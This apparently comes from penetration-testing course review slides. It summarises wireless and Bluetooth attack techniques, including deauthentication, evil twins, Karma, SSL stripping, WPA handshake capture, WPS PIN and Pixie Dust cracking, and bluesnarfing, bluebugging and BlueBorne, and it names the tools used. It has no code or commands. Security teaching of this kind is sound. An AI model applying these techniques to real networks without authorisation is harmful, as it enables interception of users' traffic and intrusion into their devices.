Penetrating Wireless Networks Review (cont’d)

• Use a tool like aireplay-ng to knock clients off a WAP
• Spoof MAC addresses in deauthentication attacks
• Use evil twins to entice users to connect to your rogue AP
• Use Karma attacks: answer the client’s own probe requests so that it connects to the evil twin
• Use SSL strip with an evil twin to downgrade a user’s HTTPS session
• Place your wireless interface in monitor mode to receive all 802.11 frames on the channel
• Use airodump-ng to sniff the four-way wireless handshake for WPA/WPA2 key cracking

Penetrating Wireless Networks Review (cont’d)

• Use online brute forcing to crack a WPS PIN
• Use the Pixie Dust attack to conduct offline cracking of vulnerable APs
• Use bluejacking to send unsolicited messages to discoverable Bluetooth devices
• Use bluesnarfing to read sensitive information from discoverable Bluetooth devices
• Use bluebugging to gain system access to a Bluetooth-enabled device
• Use BlueBorne to gain access to a Bluetooth-enabled device without involving the victim

Lab 14: Hacking Wireless